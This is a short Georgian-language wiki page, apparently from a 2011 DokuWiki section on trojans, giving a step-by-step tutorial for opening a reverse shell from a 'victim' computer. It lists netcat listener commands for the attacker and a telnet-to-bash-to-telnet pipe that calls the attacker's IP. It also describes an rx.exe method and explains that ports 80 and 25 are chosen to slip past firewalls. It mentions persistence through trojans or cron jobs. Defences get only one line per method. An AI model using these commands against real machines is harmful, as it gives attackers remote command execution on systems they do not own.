უკუღმა ტელნეტის სესია

netcat (ვინდოუსი ან იუნიქსი)

ეხლა გაჩვენებთ როგორ უნდა გააკეთოთ netcat-ით reverse telnet შელი მსხვერპლის კომპიუტერიდან.

შენს კომპიუტერში (თავდამსხმელი):

გაუშვი პირველი შელში: გაუშვი netcat-ი ისე რომ 80-ე პორტზე ელოდოს კლიენტს.

nc -l -n -v -p 80

გაუშვი მეორე შელში: გაუშვი netcat-ი ისე რომ 25-ე პორტზე ელოდოს კლიენტს.

nc -l -n -v -p 25

მსხვერპლის კომპიუტერში ქენი:

ქენი:

/usr/bin/telnet <თავდამსხმელის აიპი> 80 | /bin/bash | /usr/bin/telnet <თავდამსხმელის აიპი> 25

თავდამსხმელის კომპიუტერში, რომელიც 80 პორტზე უსმენს, შეგიძლია ბრძანებების მიცემა ისე როგორც მსხვერპილის კომპიუტერის წინ ყოფილხარ. რეზულტატი მეორე შელზე გამოჩდება.

-l: listening (სმენა) 
-p: port (პორტი) 
-t: telnet (ტელნეტი)

უმრავლესი ადმინისტრატორი ისე აკონფიგრირებს firewall-ს რომ 80 (HTTP) და 25 (SMTP) შესღუდული არ იყოს. ამიტომაც არიან ეს პორტები შერჩეულნი.

მსხვერპლის კომპიუტერთან თავდამსხმელს ავტომატურად შეუძლია დაუკავშურდეს ტელნეტით, ტროიანის გამოყენებით ან იუნიქსის შემთხვევაში cron job-ით.

დაცვა

telnet-ის გამორთვა, bastion computers.

rx.exe (ვინდოუსი)

მაგალითი

ეტაპი 1: თავდამსხმელის კომპიუტერში გაუშვი netcat-ი რომ დაელოდო კავშირს.

nc -l -n -v -p 8080

ეტაპი 2: გაუშვი netcat-ი მსხვერპლის კომპიუტერში.

ეტაპი 3: მსხვერპლის კომპიუტერში გაუშვი rx.exe: rx.exe <თავდამსხმელის აიპი>

ეტაპი 4: თავდამსხმელის შეუძლია მსხვერპლის კომპიუტერი აკონტროლოს და ბრძანებები გაუშვას მსხვერპლის კომპიუტერში.

მსხვერპლის კომპიუტერი თავდამსხმელს შეიძლება ავტომატურად დაუკავშურდეს ტელნეტით, ტროიანის გამოყენებით ან იუნიქსის შემთხვევაში cron job-ით.

დაცვა

განახლებული ანტივირუსი, ძლიერი ACL-ები.

ტროას_ცხენი/უკუღმა_შელი.txt · Last modified: 2011/09/22 17:47 (external edit)
Back to top
Public Domain
chimeric.de = chi`s home Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0